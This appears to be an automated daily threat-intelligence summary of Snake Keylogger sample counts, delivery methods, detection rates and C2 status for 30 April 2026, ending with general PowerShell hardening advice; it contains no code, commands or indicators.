Daily Summary
Snake Keylogger activity remains stable on 2026-04-30, with 9 new samples detected against a 7-day average of 8, representing a modest 7% increase. This marks a steady plateau after last week’s moderate surge, with no significant spike or drop observed. The trend remains within normal fluctuation ranges, indicating sustained operational tempo by threat actors.
New Samples Detected
PowerShell scripts (.ps1) dominate today’s haul at 6 of 9 samples, followed by 2 batch files (.bat) and 1 dynamic link library (.dll). This marks a clear shift toward script-based delivery over traditional executable payloads, with the .dll sample suggesting staged infection chains. File naming conventions observed include randomized alphanumeric strings, a departure from earlier themed lures. The script-heavy mix may indicate attempts to bypass static signature-based detection.
Distribution Methods
Today’s sample set points to phishing emails with script attachments, likely disguised as invoices or delivery confirmations. The prevalence of .ps1 and .bat files suggests attackers are exploiting Windows-native script execution to avoid standard macro-blocking policies. No malicious Office documents were detected, signaling a tactical pivot from macro-laden attachments to lightweight downloaders that fetch the main payload. Campaign patterns align with Tuesday-Thursday business hours targeting, consistent with prior Snake Keylogger operations.
Detection Rate
Current AV engine coverage against these 9 samples is moderate, with 4 of 9 flagged as malicious by at least 5 engines on VirusTotal. The remaining 5 samples show detection rates below 30%, indicating that recently compiled variants may employ obfuscation or packing to evade signature-based engines. Heuristic and behavior-based detection remains the primary line of defense.
C2 Infrastructure
No new C2 servers were identified today, and no active infrastructure changes were noted. The absence of new domains or IP shifts suggests threat actors are rotating existing C2 nodes from last week’s arsenal. This stability may indicate a maintenance phase or deliberate operational security pause.
7-Day Trend
This week’s activity remains consistent with the 7-day moving average, with daily counts fluctuating between 7 and 9 samples since April 24. There is no clear upward or downward trajectory, suggesting the campaign has reached a steady state with no signs of escalation or decline.
Security Analysis
A non-obvious observation is that the shift to script-based delivery (6 .ps1 files today versus none on some prior days) may reflect attackers compensating for Microsoft’s tightening of VBA macros. This tactic echoes early 2024 campaigns where PowerShell was used as a drop-in replacement for macros. Actionable recommendation: Enforce Constrained Language Mode for PowerShell via Group Policy across endpoints to block arbitrary script execution, and monitor process creation events for wscript.exe spawning powershell.exe.